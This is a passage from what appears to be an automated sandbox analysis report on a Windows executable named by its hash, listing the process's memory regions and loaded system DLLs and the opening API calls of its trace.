end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1294
start_va = 0x8c0000
end_va = 0xa47fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 1295
start_va = 0x741b0000
end_va = 0x741dafff
monitored = 0
entry_point = 0x741b5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1296
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1297
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1298
start_va = 0xa50000
end_va = 0xbd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 1299
start_va = 0xbe0000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000be0000"
filename = ""
Region:
id = 1300
start_va = 0x1fe0000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 1301
start_va = 0x72cb0000
end_va = 0x72d24fff
monitored = 0
entry_point = 0x72ce9a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1302
start_va = 0x1fe0000
end_va = 0x20effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 1303
start_va = 0x2170000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002170000"
filename = ""
Region:
id = 1305
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1306
start_va = 0x74340000
end_va = 0x743c3fff
monitored = 0
entry_point = 0x74366220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1307
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1308
start_va = 0x6f780000
end_va = 0x6f794fff
monitored = 0
entry_point = 0x6f78e570
region_type = mapped_file
name = "devenum.dll"
filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll")
Region:
id = 1309
start_va = 0x6efd0000
end_va = 0x6eff3fff
monitored = 0
entry_point = 0x6efd4820
region_type = mapped_file
name = "winmm.dll"
filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll")
Region:
id = 1310
start_va = 0x6efa0000
end_va = 0x6efc2fff
monitored = 0
entry_point = 0x6efa8940
region_type = mapped_file
name = "winmmbase.dll"
filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll")
Region:
id = 1311
start_va = 0x620000
end_va = 0x623fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1312
start_va = 0x76d60000
end_va = 0x7716afff
monitored = 0
entry_point = 0x76d8adf0
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1313
start_va = 0x6ef70000
end_va = 0x6ef97fff
monitored = 0
entry_point = 0x6ef77820
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 1314
start_va = 0x6ef40000
end_va = 0x6ef61fff
monitored = 0
entry_point = 0x6ef491f0
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 1315
start_va = 0x74c00000
end_va = 0x74c41fff
monitored = 0
entry_point = 0x74c16f10
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 1316
start_va = 0x6f770000
end_va = 0x6f778fff
monitored = 0
entry_point = 0x6f7729b0
region_type = mapped_file
name = "msdmo.dll"
filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll")
Region:
id = 1317
start_va = 0x6ef20000
end_va = 0x6ef33fff
monitored = 0
entry_point = 0x6ef2e190
region_type = mapped_file
name = "avicap32.dll"
filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll")
Region:
id = 1318
start_va = 0x6eef0000
end_va = 0x6ef12fff
monitored = 0
entry_point = 0x6ef033e0
region_type = mapped_file
name = "msvfw32.dll"
filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll")
Region:
id = 1319
start_va = 0x6ee50000
end_va = 0x6eee1fff
monitored = 0
entry_point = 0x6ee5dd60
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")
Region:
id = 1320
start_va = 0x2180000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1321
start_va = 0x630000
end_va = 0x630fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 1322
start_va = 0x1fe0000
end_va = 0x209bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001fe0000"
filename = ""
Region:
id = 1323
start_va = 0x20e0000
end_va = 0x20effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020e0000"
filename = ""
Region:
id = 1324
start_va = 0x630000
end_va = 0x633fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 1325
start_va = 0x640000
end_va = 0x643fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1326
start_va = 0x7a0000
end_va = 0x7a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msvfw32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui")
Region:
id = 1327
start_va = 0x7b0000
end_va = 0x7b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "avicap32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui")
Region:
id = 1328
start_va = 0x20f0000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020f0000"
filename = ""
Region:
id = 1329
start_va = 0x7a0000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 1330
start_va = 0x7b0000
end_va = 0x7b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007b0000"
filename = ""
Region:
id = 1331
start_va = 0x20a0000
end_va = 0x20a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020a0000"
filename = ""
Region:
id = 1332
start_va = 0x20b0000
end_va = 0x20b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020b0000"
filename = ""
Region:
id = 1333
start_va = 0x20c0000
end_va = 0x20c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020c0000"
filename = ""
Region:
id = 1334
start_va = 0x20d0000
end_va = 0x20d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 1336
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1337
start_va = 0x7a0000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 1338
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1339
start_va = 0x7b0000
end_va = 0x7b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007b0000"
filename = ""
Region:
id = 1340
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1341
start_va = 0x20a0000
end_va = 0x20a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020a0000"
filename = ""
Region:
id = 1342
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1343
start_va = 0x20b0000
end_va = 0x20b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020b0000"
filename = ""
Region:
id = 1344
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1345
start_va = 0x20c0000
end_va = 0x20c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020c0000"
filename = ""
Region:
id = 1346
start_va = 0x2180000
end_va = 0x2180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1347
start_va = 0x20d0000
end_va = 0x20d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 1348
start_va = 0x2180000
end_va = 0x24b6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1349
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1350
start_va = 0x24d0000
end_va = 0x24d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024d0000"
filename = ""
Region:
id = 1351
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1352
start_va = 0x24e0000
end_va = 0x24e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 1353
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1354
start_va = 0x24f0000
end_va = 0x24f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 1355
start_va = 0x2500000
end_va = 0x2500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1356
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1357
start_va = 0x24e0000
end_va = 0x24e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 1358
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1359
start_va = 0x24f0000
end_va = 0x24f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 1360
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1361
start_va = 0x24e0000
end_va = 0x24e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 1362
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1363
start_va = 0x2510000
end_va = 0x2510fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 1364
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1365
start_va = 0x24f0000
end_va = 0x24f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 1366
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 1367
start_va = 0x24e0000
end_va = 0x24e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 1368
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024c0000"
filename = ""
Region:
id = 1369
start_va = 0x24c0000
end_va = 0x24c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024c0000"
filename = ""
Region:
id = 1370
start_va = 0x2500000
end_va = 0x2500fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002500000"
filename = ""
Region:
id = 1371
start_va = 0x2520000
end_va = 0x2520fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 1372
start_va = 0x2530000
end_va = 0x2530fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 1373
start_va = 0x2500000
end_va = 0x2500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1374
start_va = 0x2520000
end_va = 0x2520fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 1375
start_va = 0x2500000
end_va = 0x2500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1376
start_va = 0x2510000
end_va = 0x2510fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 1377
start_va = 0x24f0000
end_va = 0x24f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 1378
start_va = 0x2500000
end_va = 0x2500fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1379
start_va = 0x2540000
end_va = 0x294dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002540000"
filename = ""
Region:
id = 1380
start_va = 0x2950000
end_va = 0x2950fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 1381
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1382
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1383
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1384
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1385
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1386
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1387
start_va = 0x2950000
end_va = 0x2950fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 1388
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1389
start_va = 0x2950000
end_va = 0x2950fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 1390
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1391
start_va = 0x2970000
end_va = 0x2970fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 1392
start_va = 0x2960000
end_va = 0x2960fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1393
start_va = 0x2970000
end_va = 0x2970fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 1394
start_va = 0x2980000
end_va = 0x2980fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 1395
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1396
start_va = 0x29a0000
end_va = 0x29a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 1397
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1398
start_va = 0x29b0000
end_va = 0x29b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 1399
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1400
start_va = 0x29a0000
end_va = 0x29a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 1401
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1402
start_va = 0x29c0000
end_va = 0x29c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 1403
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1404
start_va = 0x29d0000
end_va = 0x29d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029d0000"
filename = ""
Region:
id = 1405
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1406
start_va = 0x29e0000
end_va = 0x29e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 1407
start_va = 0x29f0000
end_va = 0x29f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 1408
start_va = 0x2a00000
end_va = 0x2a00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 1409
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1410
start_va = 0x2a20000
end_va = 0x2a20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 1411
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1412
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1413
start_va = 0x2a40000
end_va = 0x2a40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 1414
start_va = 0x2a50000
end_va = 0x2a50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 1415
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1416
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1417
start_va = 0x2a40000
end_va = 0x2a40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 1418
start_va = 0x2a50000
end_va = 0x2a50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 1419
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1420
start_va = 0x2a20000
end_va = 0x2a20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 1421
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1422
start_va = 0x2a40000
end_va = 0x2a40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 1423
start_va = 0x2a50000
end_va = 0x2a50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 1424
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1425
start_va = 0x2990000
end_va = 0x2990fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 1426
start_va = 0x71200000
end_va = 0x7124efff
monitored = 0
entry_point = 0x7120d850
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1427
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1428
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1429
start_va = 0x2a20000
end_va = 0x2a20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 1430
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1431
start_va = 0x2a40000
end_va = 0x2a40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 1432
start_va = 0x6ef30000
end_va = 0x6ef3cfff
monitored = 0
entry_point = 0x6ef33520
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll")
Region:
id = 1433
start_va = 0x6eec0000
end_va = 0x6ef26fff
monitored = 0
entry_point = 0x6eedb610
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll")
Region:
id = 1434
start_va = 0x2a50000
end_va = 0x2a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 1435
start_va = 0x2a90000
end_va = 0x2b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a90000"
filename = ""
Region:
id = 1436
start_va = 0x2b90000
end_va = 0x2bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 1437
start_va = 0x2bd0000
end_va = 0x2ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 1438
start_va = 0x2cd0000
end_va = 0x2d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cd0000"
filename = ""
Region:
id = 1439
start_va = 0x2d10000
end_va = 0x2e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d10000"
filename = ""
Region:
id = 1440
start_va = 0x6eea0000
end_va = 0x6eeb0fff
monitored = 0
entry_point = 0x6eea8fa0
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll")
Region:
id = 1441
start_va = 0x6ede0000
end_va = 0x6ee9efff
monitored = 0
entry_point = 0x6ee11e80
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll")
Region:
id = 1599
start_va = 0x2a10000
end_va = 0x2a10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 1600
start_va = 0x2e10000
end_va = 0x321efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e10000"
filename = ""
Region:
id = 1601
start_va = 0x2a20000
end_va = 0x2a20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 1602
start_va = 0x2a30000
end_va = 0x2a30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1603
start_va = 0x3220000
end_va = 0x3220fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003220000"
filename = ""
Region:
id = 1604
start_va = 0x3230000
end_va = 0x3230fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003230000"
filename = ""
Region:
id = 1605
start_va = 0x3240000
end_va = 0x3240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003240000"
filename = ""
Region:
id = 1606
start_va = 0x3240000
end_va = 0x3240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003240000"
filename = ""
Region:
id = 1607
start_va = 0x3240000
end_va = 0x3240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003240000"
filename = ""
Region:
id = 1608
start_va = 0x3250000
end_va = 0x3250fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003250000"
filename = ""
Region:
id = 1609
start_va = 0x3260000
end_va = 0x3260fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003260000"
filename = ""
Region:
id = 1610
start_va = 0x3270000
end_va = 0x3270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003270000"
filename = ""
Region:
id = 1611
start_va = 0x2a20000
end_va = 0x2a20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Thread:
id = 95
os_tid = 0x127c
[0192.469] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe\""
[0192.469] GetStartupInfoA (in: lpStartupInfo=0x19ff3c | out: lpStartupInfo=0x19ff3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0192.469] GetProcessHeap () returned 0x7c0000
[0192.469] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x80) returned 0x7c3900
[0192.565] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x190
[0192.565] GetProcessHeap () returned 0x7c0000
[0192.565] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x38) returned 0x7d0078
[0192.565] GetProcessHeap () returned 0x7c0000
[0192.565] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x14) returned 0x7caaf0
[0192.565] GetProcessHeap () returned 0x7c0000
[0192.565] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x28) returned 0x7c87b0
[0192.565] GetProcessHeap () returned 0x7c0000
